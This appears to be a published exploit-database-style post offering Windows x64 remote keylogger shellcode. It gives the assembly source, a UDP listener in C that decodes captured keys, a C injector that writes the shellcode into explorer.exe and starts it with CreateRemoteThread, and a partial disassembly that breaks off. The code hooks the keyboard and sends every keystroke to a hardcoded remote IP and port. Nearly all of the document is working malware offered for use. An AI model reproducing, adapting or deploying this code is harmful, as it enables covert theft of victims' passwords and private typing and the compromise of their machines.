mov rax,'ws2_32.d'
mov [rsp],rax
mov [rsp+8],word 'll'
lea rcx,[rsp]
mov rsi,[rdi+8]
sub rsp,40
call rsi
xchg rsi,rax
;----------------------------------------------------------
;loading user32.dll
lea rcx,[rsp+40]
mov [rcx],dword 'user'
call rax
;====================================
;loading user32.dll functions
mov rcx,rax
lea rdx,[r13-(get_addr-user32_func)]
xor r8,r8
mov r8b,6
lea r9,[rdi+16] ;user32.dll functions from 16
call r13
;===================================
;loading ws2_32.dll functions
mov rcx,rsi
lea rdx,[r13-(get_addr-ws2_32_func)]
xor r8,r8
mov r8b,3
lea r9,[rdi+64] ;ws2_32.dll functions from 64
call r13
add rsp,56
;===========================================All necessary functions are loaded. Time to proceed to main task ========================================
_p3_:
xor rcx,rcx
mov cx,408
sub rsp,rcx
add rcx,106
lea rdx,[rsp]
mov rbx,[rdi+64] ;WSAStartup()
call rbx
xor rcx,rcx
mov cl,2
push rcx
push rcx
pop rdx
pop r8
mov r8b,17
mov rbx,[rdi+72] ;socket()
call rbx
mov [rdi+8],rax ;SOCKET
mov rbx,[rdi] ; GetModuleHandleA()
xor rcx,rcx
call rbx
;------------------------------------
mov [r15],byte 2
mov [r15+2],word 0x83db ;port change it
mov [r15+4],dword 0x63c1a1c1 ;IP change it
;-----------------------------------
xor r9,r9
push r9
push r9
pop rcx
pop rdx
mov cl,13
mov r8,rax
mov dl,_proceed_-get_addr
add rdx,r13
mov rbx,[rdi+16] ;SetWindowsHookExA()
call rbx
_p4_:
lea rcx,[r12+8]
xor rdx,rdx
push rdx
push rdx
pop r8
pop r9
mov rbx,[rdi+40] ;GetMessageA()
call rbx
lea rcx,[r12+8]
mov rbx,[rdi+48] ;TranslateMessage()
call rbx
lea rcx,[r12+8]
mov rbx,[rdi+56] ;DispatchMessageA()
call rbx
jmp short _p4_
;----------------------------------------------------------------------------------------
kernel32_func:
db 'GetModuleHandleA',1,'LoadLibraryA',1
user32_func:
db 'SetWindowsHookExA',1,'CallNextHookEx',1,'GetKeyState',1,'GetMessageA',1,'TranslateMessage',1,'DispatchMessageA',1
ws2_32_func:
db 'WSAStartup',1,'socket',1,'sendto',1
get_addr: ; rcx=dll base , rdx=function name string address , r8=number of functions , r9=address of buffer
db 0x56,0x57,0x41,0x50,0x52,0x41,0x51,0x51,0x41,0x5b,0x48,0x31,0xdb,0x53,0x53,0x5a,0x58,0x8b,0x59,0x3c,0x48,0x01,0xcb,0xb2,0x88,0x8b,0x04,0x13,0x48,0x01,0xc8,0x48,0x31,0xd2,0x52,0x52,0x52,0x41,0x58,0x41,0x59,0x41,0x5a,0x44,0x8b,0x40,0x20,0x4d,0x01,0xd8,0x44,0x8b,0x48,0x24,0x4d,0x01,0xd9,0x44,0x8b,0x50,0x1c,0x4d,0x01,0xda,0x48,0x31,0xd2,0x48,0x31,0xf6,0x56,0x59,0x41,0x8b,0x34,0x90,0x4c,0x01,0xde,0x48,0x8b,0x7c,0x24,0x08,0x48,0x31,0xc0,0x8a,0x04,0x0f,0x48,0xff,0xc1,0x3c,0x01,0x75,0xf6,0x48,0xff,0xc2,0x51,0x48,0xff,0xc9,0x48,0x87,0xf7,0xf3,0xa6,0x59,0x75,0xd3,0x48,0xff,0xca,0x48,0x8b,0x7c,0x24,0x08,0x48,0x01,0xcf,0x48,0x89,0x7c,0x24,0x08,0x48,0x31,0xdb,0x53,0x58,0x66,0x41,0x8b,0x1c,0x51,0x41,0x8b,0x04,0x9a,0x4c,0x01,0xd8,0x48,0x8b,0x1c,0x24,0x48,0x89,0x03,0x48,0x83,0xc3,0x08,0x48,0x89,0x1c,0x24,0x48,0x8b,0x5c,0x24,0x10,0x48,0xff,0xcb,0x48,0x89,0x5c,0x24,0x10,0x48,0x31,0xd2,0x48,0x39,0xd3,0x75,0x8e,0x48,0x83,0xc4,0x18,0x5f,0x5e,0xc3
;-------------------------------------------------------------------------------------------------------------------
_proceed_:
sub rsp,88
push r8
push rdx
push rcx
;---------------------------------------------
xor rsi,rsi
mov rax,'HEREITIS'
find:
mov r10,[rsp+rsi]
inc rsi
cmp r10,rax
jne find
add rsi,7
lea rbx,[rsp+rsi]
mov rdi,[rbx]
mov r12,[rbx+8]
mov r15,[rbx+16]
;------------------------------------------------
test rcx,rcx
jnz short _out_
xor rbx,rbx
mov bl,1
shl rbx,8
cmp rdx,rbx
jne short _out_
;--------------------------------------------------------
mov rbx,[rdi+32] ;GetKeyState(VK_CAPITAL)
xor rcx,rcx
mov cl,0x14
call rbx
mov [r12],ax
mov rbx,[rdi+32] ;GetKeyState(VK_SHIFT)
xor rcx,rcx
mov cl,0x10
call rbx
mov [r12+2],ax
;-------------------------------
;sending keystrokes
mov rbx,[rsp+16]
mov eax,[rbx]
mov [r12+4],eax ;Virtual key code
sub rsp,88
mov rcx,[rdi+8] ;SOCKET
push r12
pop rdx
xor r9,r9
push r9
pop r8
mov r8b,16
mov [rsp+32],r15
mov [rsp+40],r8
sub r8,8
mov rbx,[rdi+80]
call rbx
add rsp,88
;-----------------------------------------------------------
_out_:
pop rdx
pop r8
pop r9
mov rbx,[rdi+24]
xor rcx,rcx
call rbx
add rsp,88
ret
*/
/*
//keylogger Handler
#include
#include
#include
#pragma pack(1)
typedef struct key
{
short caps;
short shift;
DWORD vkcode;
}KEYDATA;
char * Determine(BOOL caps,BOOL shift,DWORD code)
{
char * key;
switch (code) // SWITCH ON INT
{
case 0x41: key = caps ? (shift ? "a" : "A") : (shift ? "A" : "a"); break;
case 0x42: key = caps ? (shift ? "b" : "B") : (shift ? "B" : "b"); break;
case 0x43: key = caps ? (shift ? "c" : "C") : (shift ? "C" : "c"); break;
case 0x44: key = caps ? (shift ? "d" : "D") : (shift ? "D" : "d"); break;
case 0x45: key = caps ? (shift ? "e" : "E") : (shift ? "E" : "e"); break;
case 0x46: key = caps ? (shift ? "f" : "F") : (shift ? "F" : "f"); break;
case 0x47: key = caps ? (shift ? "g" : "G") : (shift ? "G" : "g"); break;
case 0x48: key = caps ? (shift ? "h" : "H") : (shift ? "H" : "h"); break;
case 0x49: key = caps ? (shift ? "i" : "I") : (shift ? "I" : "i"); break;
case 0x4A: key = caps ? (shift ? "j" : "J") : (shift ? "J" : "j"); break;
case 0x4B: key = caps ? (shift ? "k" : "K") : (shift ? "K" : "k"); break;
case 0x4C: key = caps ? (shift ? "l" : "L") : (shift ? "L" : "l"); break;
case 0x4D: key = caps ? (shift ? "m" : "M") : (shift ? "M" : "m"); break;
case 0x4E: key = caps ? (shift ? "n" : "N") : (shift ? "N" : "n"); break;
case 0x4F: key = caps ? (shift ? "o" : "O") : (shift ? "O" : "o"); break;
case 0x50: key = caps ? (shift ? "p" : "P") : (shift ? "P" : "p"); break;
case 0x51: key = caps ? (shift ? "q" : "Q") : (shift ? "Q" : "q"); break;
case 0x52: key = caps ? (shift ? "r" : "R") : (shift ? "R" : "r"); break;
case 0x53: key = caps ? (shift ? "s" : "S") : (shift ? "S" : "s"); break;
case 0x54: key = caps ? (shift ? "t" : "T") : (shift ? "T" : "t"); break;
case 0x55: key = caps ? (shift ? "u" : "U") : (shift ? "U" : "u"); break;
case 0x56: key = caps ? (shift ? "v" : "V") : (shift ? "V" : "v"); break;
case 0x57: key = caps ? (shift ? "w" : "W") : (shift ? "W" : "w"); break;
case 0x58: key = caps ? (shift ? "x" : "X") : (shift ? "X" : "x"); break;
case 0x59: key = caps ? (shift ? "y" : "Y") : (shift ? "Y" : "y"); break;
case 0x5A: key = caps ? (shift ? "z" : "Z") : (shift ? "Z" : "z"); break;
// Sleep Key
case VK_SLEEP: key = "[SLEEP]"; break;
// Num Keyboard
case VK_NUMPAD0: key = "0"; break;
case VK_NUMPAD1: key = "1"; break;
case VK_NUMPAD2 : key = "2"; break;
case VK_NUMPAD3: key = "3"; break;
case VK_NUMPAD4: key = "4"; break;
case VK_NUMPAD5: key = "5"; break;
case VK_NUMPAD6: key = "6"; break;
case VK_NUMPAD7: key = "7"; break;
case VK_NUMPAD8: key = "8"; break;
case VK_NUMPAD9: key = "9"; break;
case VK_MULTIPLY: key = "*"; break;
case VK_ADD: key = "+"; break;
case VK_SEPARATOR: key = "-"; break;
case VK_SUBTRACT: key = "-"; break;
case VK_DECIMAL: key = "."; break;
case VK_DIVIDE: key = "/"; break;
// Function Keys
case VK_F1: key = "[F1]"; break;
case VK_F2: key = "[F2]"; break;
case VK_F3: key = "[F3]"; break;
case VK_F4: key = "[F4]"; break;
case VK_F5: key = "[F5]"; break;
case VK_F6: key = "[F6]"; break;
case VK_F7: key = "[F7]"; break;
case VK_F8: key = "[F8]"; break;
case VK_F9: key = "[F9]"; break;
case VK_F10: key = "[F10]"; break;
case VK_F11: key = "[F11]"; break;
case VK_F12: key = "[F12]"; break;
case VK_F13: key = "[F13]"; break;
case VK_F14: key = "[F14]"; break;
case VK_F15: key = "[F15]"; break;
case VK_F16: key = "[F16]"; break;
case VK_F17: key = "[F17]"; break;
case VK_F18: key = "[F18]"; break;
case VK_F19: key = "[F19]"; break;
case VK_F20: key = "[F20]"; break;
case VK_F21: key = "[F22]"; break;
case VK_F22: key = "[F23]"; break;
case VK_F23: key = "[F24]"; break;
case VK_F24: key = "[F25]"; break;
// Keys
case VK_NUMLOCK: key = "[NUM-LOCK]"; break;
case VK_SCROLL: key = "[SCROLL-LOCK]"; break;
case VK_BACK: key = "[BACK]"; break;
case VK_TAB: key = "[TAB]"; break;
case VK_CLEAR: key = "[CLEAR]"; break;
case VK_RETURN: key = "[ENTER]"; break;
case VK_SHIFT: key = "[SHIFT]"; break;
case VK_CONTROL: key = "[CTRL]"; break;
case VK_MENU: key = "[ALT]"; break;
case VK_PAUSE: key = "[PAUSE]"; break;
case VK_CAPITAL: key = "[CAP-LOCK]"; break;
case VK_ESCAPE: key = "[ESC]"; break;
case VK_SPACE: key = "[SPACE]"; break;
case VK_PRIOR: key = "[PAGEUP]"; break;
case VK_NEXT: key = "[PAGEDOWN]"; break;
case VK_END: key = "[END]"; break;
case VK_HOME: key = "[HOME]"; break;
case VK_LEFT: key = "[LEFT]"; break;
case VK_UP: key = "[UP]"; break;
case VK_RIGHT: key = "[RIGHT]"; break;
case VK_DOWN: key = "[DOWN]"; break;
case VK_SELECT: key = "[SELECT]"; break;
case VK_PRINT: key = "[PRINT]"; break;
case VK_SNAPSHOT: key = "[PRTSCRN]"; break;
case VK_INSERT: key = "[INS]"; break;
case VK_DELETE: key = "[DEL]"; break;
case VK_HELP: key = "[HELP]"; break;
// Number Keys with shift
case 0x30: key = shift ? ")" : "0"; break;
case 0x31: key = shift ? "!" : "1"; break;
case 0x32: key = shift ? "@" : "2"; break;
case 0x33: key = shift ? "#" : "3"; break;
case 0x34: key = shift ? "$" : "4"; break;
case 0x35: key = shift ? "%" : "5"; break;
case 0x36: key = shift ? "^" : "6"; break;
case 0x37: key = shift ? "&" : "7"; break;
case 0x38: key = shift ? "*" : "8"; break;
case 0x39: key = shift ? "(" : "9"; break;
// Windows Keys
case VK_LWIN: key = "[WIN]"; break;
case VK_RWIN: key = "[WIN]"; break;
case VK_LSHIFT: key = "[SHIFT]"; break;
case VK_RSHIFT: key = "[SHIFT]"; break;
case VK_LCONTROL: key = "[CTRL]"; break;
case VK_RCONTROL: key = "[CTRL]"; break;
// OEM Keys with shift
case VK_OEM_1: key = shift ? ":" : ";"; break;
case VK_OEM_PLUS: key = shift ? "+" : "="; break;
case VK_OEM_COMMA: key = shift ? "<" : ","; break; case VK_OEM_MINUS: key = shift ? "_" : "-"; break; case VK_OEM_PERIOD: key = shift ? ">" : "."; break;
case VK_OEM_2: key = shift ? "?" : "/"; break;
case VK_OEM_3: key = shift ? "~" : "`"; break;
case VK_OEM_4: key = shift ? "{" : "["; break;
case VK_OEM_5: key = shift ? "|" : "\\"; break;
case VK_OEM_6: key = shift ? "}" : "]"; break;
case VK_OEM_7: key = shift ? "\"" : "'"; break; //TODO: Escape this char: "
// Action Keys
case VK_PLAY: key = "[PLAY]";break;
case VK_ZOOM: key = "[ZOOM]";break;
case VK_OEM_CLEAR: key = "[CLEAR]";break;
case VK_CANCEL: key = "[CTRL-C]";break;
default: key = "[UNK-KEY]";break;
}
return key;
}
int main()
{
int port;
SOCKET s;
struct sockaddr_in sr,cr;
WSADATA wsa;
KEYDATA keystrk;
char * n;
printf("Enter Port Number To Listen: ");
scanf("%d",&port);
if(WSAStartup(514,&wsa))
{
printf("WSAStartup() Failed");
return 0;
}
if((s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
{
printf("Failed To Create Socket...");
return 0;
}
ZeroMemory(&sr,16);
sr.sin_family=AF_INET;
sr.sin_port=htons(port);
if(bind(s,(struct sockaddr *)&sr,16))
{
printf("Failed To Bind..");
return 0;
}
port=16; //Why bother to declare a variable for int * fromlen
while(1)
{
recvfrom(s,(char *)&keystrk,8,0,(struct sockaddr *)&cr,&port);
n=Determine(keystrk.caps&0x0001,keystrk.shift>>15,keystrk.vkcode);
printf("%s",n);
}
return 0;
}
*/
#include
#include
#include
#include
char shellcode[]="\xeb\x1d\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x40\x20\x48\x8b\x30\x48\x8b\x06\x48\x8b\x70\x20\x5b\x53\xc3\xe8\xde\xff\xff\xff\x52\x52\x4c\x8d\x3c\x24\x48\x83\xec\x38\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x8d\x3c\x24\x41\x57\x41\x54\x57\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x50\x48\x31\xc0\x66\xb8\xcc\x01\x48\x01\xc3\x53\x48\x89\xf1\x48\x8d\x93\x6e\xff\xff\xff\x4d\x31\xc0\x41\xb0\x02\x49\x89\xf9\xff\xd3\x41\x5d\x48\x31\xc0\x50\x50\x48\xb8\x77\x73\x32\x5f\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x8b\x77\x08\x48\x83\xec\x28\xff\xd6\x48\x96\x48\x8d\x4c\x24\x28\xc7\x01\x75\x73\x65\x72\xff\xd0\x48\x89\xc1\x49\x8d\x55\x8c\x4d\x31\xc0\x41\xb0\x06\x4c\x8d\x4f\x10\x41\xff\xd5\x48\x89\xf1\x49\x8d\x55\xe7\x4d\x31\xc0\x41\xb0\x03\x4c\x8d\x4f\x40\x41\xff\xd5\x48\x83\xc4\x38\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x83\xc1\x6a\x48\x8d\x14\x24\x48\x8b\x5f\x40\xff\xd3\x48\x31\xc9\xb1\x02\x51\x51\x5a\x41\x58\x41\xb0\x11\x48\x8b\x5f\x48\xff\xd3\x48\x89\x47\x08\x48\x8b\x1f\x48\x31\xc9\xff\xd3\x41\xc6\x07\x02\x66\x41\xc7\x47\x02\xdb\x83\x41\xc7\x47\x04\xc1\xa1\xc1\x63\x4d\x31\xc9\x41\x51\x41\x51\x59\x5a\xb1\x0d\x49\x89\xc0\xb2\xbc\x4c\x01\xea\x48\x8b\x5f\x10\xff\xd3\x49\x8d\x4c\x24\x08\x48\x31\xd2\x52\x52\x41\x58\x41\x59\x48\x8b\x5f\x28\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x30\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x38\xff\xd3\xeb\xd4\x47\x65\x74\x4d\x6f\x64\x75\x6c\x65\x48\x61\x6e\x64\x6c\x65\x41\x01\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x01\x53\x65\x74\x57\x69\x6e\x64\x6f\x77\x73\x48\x6f\x6f\x6b\x45\x78\x41\x01\x43\x61\x6c\x6c\x4e\x65\x78\x74\x48\x6f\x6f\x6b\x45\x78\x01\x47\x65\x74\x4b\x65\x79\x53\x74\x61\x74\x65\x01\x47\x65\x74\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x54\x72\x61\x6e\x73\x6c\x61\x74\x65\x4d\x65\x73\x73\x61\x67\x65\x01\x44\x69\x73\x70\x61\x74\x63\x68\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x01\x73\x6f\x63\x6b\x65\x74\x01\x73\x65\x6e\x64\x74\x6f\x01\x56\x57\x41\x50\x52\x41\x51\x51\x41\x5b\x48\x31\xdb\x53\x53\x5a\x58\x8b\x59\x3c\x48\x01\xcb\xb2\x88\x8b\x04\x13\x48\x01\xc8\x48\x31\xd2\x52\x52\x52\x41\x58\x41\x59\x41\x5a\x44\x8b\x40\x20\x4d\x01\xd8\x44\x8b\x48\x24\x4d\x01\xd9\x44\x8b\x50\x1c\x4d\x01\xda\x48\x31\xd2\x48\x31\xf6\x56\x59\x41\x8b\x34\x90\x4c\x01\xde\x48\x8b\x7c\x24\x08\x48\x31\xc0\x8a\x04\x0f\x48\xff\xc1\x3c\x01\x75\xf6\x48\xff\xc2\x51\x48\xff\xc9\x48\x87\xf7\xf3\xa6\x59\x75\xd3\x48\xff\xca\x48\x8b\x7c\x24\x08\x48\x01\xcf\x48\x89\x7c\x24\x08\x48\x31\xdb\x53\x58\x66\x41\x8b\x1c\x51\x41\x8b\x04\x9a\x4c\x01\xd8\x48\x8b\x1c\x24\x48\x89\x03\x48\x83\xc3\x08\x48\x89\x1c\x24\x48\x8b\x5c\x24\x10\x48\xff\xcb\x48\x89\x5c\x24\x10\x48\x31\xd2\x48\x39\xd3\x75\x8e\x48\x83\xc4\x18\x5f\x5e\xc3\x48\x83\xec\x58\x41\x50\x52\x51\x48\x31\xf6\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x4c\x8b\x14\x34\x48\xff\xc6\x49\x39\xc2\x75\xf4\x48\x83\xc6\x07\x48\x8d\x1c\x34\x48\x8b\x3b\x4c\x8b\x63\x08\x4c\x8b\x7b\x10\x48\x85\xc9\x75\x68\x48\x31\xdb\xb3\x01\x48\xc1\xe3\x08\x48\x39\xda\x75\x5a\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x14\xff\xd3\x66\x41\x89\x04\x24\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x10\xff\xd3\x66\x41\x89\x44\x24\x02\x48\x8b\x5c\x24\x10\x8b\x03\x41\x89\x44\x24\x04\x48\x83\xec\x58\x48\x8b\x4f\x08\x41\x54\x5a\x4d\x31\xc9\x41\x51\x41\x58\x41\xb0\x10\x4c\x89\x7c\x24\x20\x4c\x89\x44\x24\x28\x49\x83\xe8\x08\x48\x8b\x5f\x50\xff\xd3\x48\x83\xc4\x58\x5a\x41\x58\x41\x59\x48\x8b\x5f\x18\x48\x31\xc9\xff\xd3\x48\x83\xc4\x58\xc3";
int main()
{
HANDLE s,proc;
PROCESSENTRY32 ps;
BOOL process_found=0;
LPVOID shell;
SIZE_T total;
//finding explorer.exe pid
ps.dwSize=sizeof(ps);
s=CreateToolhelp32Snapshot(2,0);
if(s==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() failed.Error code %d\n",GetLastError());
return -1;
}
if(!Process32First(s,&ps))
{
printf("Process32First() failed.Error code %d\n",GetLastError());
return -1;
}
do{
if(0==strcmp(ps.szExeFile,"explorer.exe"))
{
process_found=1;
break;
}
}while(Process32Next(s,&ps));
if(!process_found)
{
printf("Unknown Process\n");
return -1;
}
//opening process using pid
proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);
if(proc==INVALID_HANDLE_VALUE)
{
printf("OpenProcess() failed.Error code %d\n",GetLastError());
return -1;
}
//allocating memory process memory
if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)
{
printf("Failed to allocate memory into process");
CloseHandle(proc);
return -1;
}
//writing shellcode into process memory
WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);
if(sizeof(shellcode)!=total)
{
printf("Failed write shellcode into process memory");
CloseHandle(proc);
return -1;
}
//Executing shellcode
if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)
{
printf("Failed to Execute shellcode");
CloseHandle(proc);
return -1;
}
CloseHandle(proc);
CloseHandle(s);
return 0;
}
# Title : Windows x64 Remote Keylogger (UDP)
# size : 864 bytes
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 10 x64 pro
# Date : 26-10-2018
# Email: shifath12@gmail.com
*/
/*
keyl.obj: file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: eb 1d jmp 1f
0000000000000002 <_init_>:
2: 48 31 d2 xor rdx,rdx
5: 65 48 8b 42 60 mov rax,QWORD PTR gs:[rdx+0x60]
a: 48 8b 40 18 mov rax,QWORD PTR [rax+0x18]
e: 48 8b 40 20 mov rax,QWORD PTR [rax+0x20]
12: 48 8b 30 mov rsi,QWORD PTR [rax]
15: 48 8b 06 mov rax,QWORD PTR [rsi]
18: 48 8b 70 20 mov rsi,QWORD PTR [rax+0x20]
1c: 5b pop rbx
1d: 53 push rbx
1e: c3 ret
000000000000001f
1f: e8 de ff ff ff call 2 <_init_>
0000000000000024 <_p2_>:
24: 52 push rdx
25: 52 push rdx
26: 4c 8d 3c 24 lea r15,[rsp]
2a: 48 83 ec 38 sub rsp,0x38
2e: 4c 8d 24 24 lea r12,[rsp]
32: 48 83 ec 58 sub rsp,0x58
36: 48 8d 3c 24 lea rdi,[rsp]
3a: 41 57 push r15
3c: 41 54 push r12
3e: 57 push rdi
3f: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548
46: 54 49 53
49: 50 push rax
4a: 48 31 c0 xor rax,rax
4d: 66 b8 cc 01 mov ax,0x1cc
51: 48 01 c3 add rbx,rax
54: 53 push rbx
55: 48 89 f1 mov rcx,rsi
58: 48 8d 93 6e ff ff ff lea rdx,[rbx-0x92]
5f: 4d 31 c0 xor r8,r8
62: 41 b0 02 mov r8b,0x2
65: 49 89 f9 mov r9,rdi
68: ff d3 call rbx
6a: 41 5d pop r13
6c: 48 31 c0 xor rax,rax
6f: 50 push rax
70: 50 push rax
71: 48 b8 77 73 32 5f 33 movabs rax,0x642e32335f327377
78: 32 2e 64
7b: 48 89 04 24 mov QWORD PTR [rsp],rax
7f: 66 c7 44 24 08 6c 6c mov WORD PTR [rsp+0x8],0x6c6c
86: 48 8d 0c 24 lea rcx,[rsp]
8a: 48 8b 77 08 mov rsi,QWORD PTR [rdi+0x8]
8e: 48 83 ec 28 sub rsp,0x28
92: ff d6 call rsi
94: 48 96 xchg rsi,rax
96: 48 8d 4c 24 28 lea rcx,[rsp+0x28]
9b: c7 01 75 73 65 72 mov DWORD PTR [rcx],0x72657375
a1: ff d0 call rax
a3: 48 89 c1 mov rcx,rax
a6: 49 8d 55 8c lea rdx,[r13-0x74]
aa: 4d 31 c0 xor r8,r8
ad: 41 b0 06 mov r8b,0x6
b0: 4c 8d 4f 10 lea r9,[rdi+0x10]
b4: 41 ff d5 call r13
b7: 48 89 f1 mov rcx,rsi
ba: 49 8d 55 e7 lea rdx,[r13-0x19]
be: 4d 31 c0 xor r8,r8
c1: 41 b0 03 mov r8b,0x3
c4: 4c 8d 4f 40 lea r9,[rdi+0x40]
c8: 41 ff d5 call r13
cb: 48 83 c4 38 add rsp,0x38
00000000000000cf <_p3_>:
cf: 48 31 c9 xor rcx,rcx
d2: 66 b9 98 01 mov cx,0x198
d6: 48 29 cc sub rsp,rcx
d9: 48 83 c1 6a add rcx,0x6a
dd: 48 8d 14 24 lea rdx,[rsp]
e1: 48 8b 5f 40 mov rbx,QWORD PTR [rdi+0x40]
e5: ff d3 call rbx
e7: 48 31 c9 xor rcx,rcx
ea: b1 02 mov cl,0x2
ec: 51 push rcx
ed: 51 push rcx
ee: 5a pop rdx
ef: 41 58 pop r8
f1: 41 b0 11 mov r8b,0x11
f4: 48 8b 5f 48 mov rbx,QWORD PTR [rdi+0x48]
f8: ff d3 call rbx
fa: 48 89 47 08 mov QWORD PTR [rdi+0x8],rax
fe: 48 8b 1f mov rbx,QWORD PTR [rdi]
101: 48 31 c9 xor rcx,rcx
104: ff d3 call rbx
106: 41 c6 07 02 mov BYTE PTR [r15],0x2
10a: 66 41 c7 47 02 db 83 mov WORD PTR [r15+0x2],0x83db
111: 41 c7 47 04 c1 a1 c1 mov DWORD PTR [r15+0x4],0x63c1a1c1
118: 63
119: 4d 31 c9 xor r9,r9
11c: 41 51 push r9
11e: 41 51 push r9
120: 59 pop rcx
121: 5a pop rdx
122: b1 0d mov cl,0xd
124: 49 89 c0 mov r8,rax
127: b2 bc mov dl,0xbc
129: 4c 01 ea add rdx,r13
12c: 48 8b 5f 10 mov rbx,QWORD PTR [rdi+0x10]
130: ff d3 call rbx
0000000000000132 <_p4_>:
132: 49 8d 4c 24 08 lea rcx,[r12+0x8]
137: 48 31 d2 xor rdx,rdx
13a: 52 push rdx
13b: 52 push rdx
13c: 41 58 pop r8
13e: 41 59 pop r9
140: 48 8b 5f 28 mov rbx,QWORD PTR [rdi+0x28]
144: ff d3 call rbx
146: 49 8d 4c 24 08 lea rcx,[r12+0x8]
14b: 48 8b 5f 30 mov rbx,QWORD PTR [rdi+0x30]
14f: ff d3 call rbx
151: 49 8d 4c 24 08 lea rcx,[r12+0x8]
156: 48 8b 5f 38 mov rbx,QWORD PTR [rdi+0x38]
15a: ff d3 call rbx
15c: eb d4 jmp 132 <_p4_>
000000000000015e
15e: 47 rex.RXB
15f: 65 74 4d gs je 1af
162: 6f outs dx,DWORD PTR ds:[rsi]
163: 64 75 6c fs jne 1d2
166: 65 48 61 gs rex.W (bad)
169: 6e outs dx,BYTE PTR ds:[rsi]
16a: 64 6c fs ins BYTE PTR es:[rdi],dx
16c: 65 41 01 4c 6f 61 add DWORD PTR gs:[r15+rbp*2+0x61],ecx
172: 64 4c 69 62 72 61 72 imul r12,QWORD PTR fs:[rdx+0x72],0x41797261
179: 79 41
17b: 01 53 65 add DWORD PTR [rbx+0x65],edx
000000000000017c
17c: 53 push rbx
17d: 65 74 57 gs je 1d7
180: 69 6e 64 6f 77 73 48 imul ebp,DWORD PTR [rsi+0x64],0x4873776f
187: 6f outs dx,DWORD PTR ds:[rsi]
188: 6f outs dx,DWORD PTR ds:[rsi]
189: 6b 45 78 41 imul eax,DWORD PTR [rbp+0x78],0x41
18d: 01 43 61 add DWORD PTR [rbx+0x61],eax
190: 6c ins BYTE PTR es:[rdi],dx
191: 6c ins BYTE PTR es:[rdi],dx
192: 4e rex.WRX
193: 65 78 74 gs js 20a
196: 48 6f rex.W outs dx,DWORD PTR ds:[rsi]
198: 6f outs dx,DWORD PTR ds:[rsi]
199: 6b 45 78 01 imul eax,DWORD PTR [rbp+0x78],0x1
19d: 47 rex.RXB
19e: 65 74 4b gs je 1ec
1a1: 65 79 53 gs jns 1f7
1a4: 74 61 je 207
1a6: 74 65 je 20d
1a8: 01 47 65 add DWORD PTR [rdi+0x65],eax
1ab: 74 4d je 1fa
1ad: 65 73 73 gs jae 223
1b0: 61 (bad)
1b1: 67 65 41 01 54 72 61 add DWORD PTR gs:[r10d+esi*2+0x61],edx
1b8: 6e outs dx,BYTE PTR ds:[rsi]
1b9: 73 6c jae 227
1bb: 61 (bad)
1bc: 74 65 je 223
1be: 4d rex.WRB
1bf: 65 73 73 gs jae 235
1c2: 61 (bad)
1c3: 67 65 01 44 69 73 add DWORD PTR gs:[ecx+ebp*2+0x73],eax
1c9: 70 61 jo 22c
1cb: 74 63 je 230
1cd: 68 4d 65 73 73 push 0x7373654d
1d2: 61 (bad)
1d3: 67 65 41 01 57 53 add DWORD PTR gs:[r15d+0x53],edx
00000000000001d7
1d7: 57 push rdi
1d8: 53 push rbx
1d9: 41 53 push r11
1db: 74 61 je 23e
1dd: 72 74 jb 253
1df: 75 70 jne 251
1e1: 01 73 6f add DWORD PTR [rbx+0x6f],esi
1e4: 63 6b 65 movsxd ebp,DWORD PTR [rbx+0x65]
1e7: 74 01 je 1ea
1e9: 73 65 jae 250
1eb: 6e outs dx,BYTE PTR ds:[rsi]
1ec: 64 74 6f fs je 25e
1ef: 01 56 57 add DWORD PTR [rsi+0x57],edx
00000000000001f0
1f0: 56 push rsi
1f1: 57 push rdi
1f2: 41 50 push r8
1f4: 52 push rdx
1f5: 41 51 push r9
1f7: 51 push rcx
1f8: 41 5b pop r11
1fa: 48 31 db xor rbx,rbx
1fd: 53 push rbx
1fe: 53 push rbx
1ff: 5a pop rdx
200: 58 pop rax
201: 8b 59 3c mov ebx,DWORD PTR [rcx+0x3c]
204: 48 01 cb add rbx,rcx
207: b2 88 mov dl,0x88
209: 8b 04 13 mov eax,DWORD PTR [rbx+rdx*1]
20c: 48 01 c8 add rax,rcx
20f: 48 31 d2 xor rdx,rdx
212: 52 push rdx
213: 52 push rdx
214: 52 push rdx
215: 41 58 pop r8
217: 41 59 pop r9
219: 41 5a pop r10
21b: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]
21f: 4d 01 d8 add r8,r11
222: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24]
226: 4d 01 d9 add r9,r11
229: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c]
22d: 4d 01 da add r10,r11
230: 48 31 d2 xor rdx,rdx
233: 48 31 f6 xor rsi,rsi
236: 56 push rsi
237: 59 pop rcx
238: 41 8b 34 90 mov esi,DWORD PTR [r8+rdx*4]
23c: 4c 01 de add rsi,r11
23f: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]
244: 48 31 c0 xor rax,rax
247: 8a 04 0f mov al,BYTE PTR [rdi+rcx*1]
24a: 48 ff c1 inc rcx
24d: 3c 01 cmp al,0x1
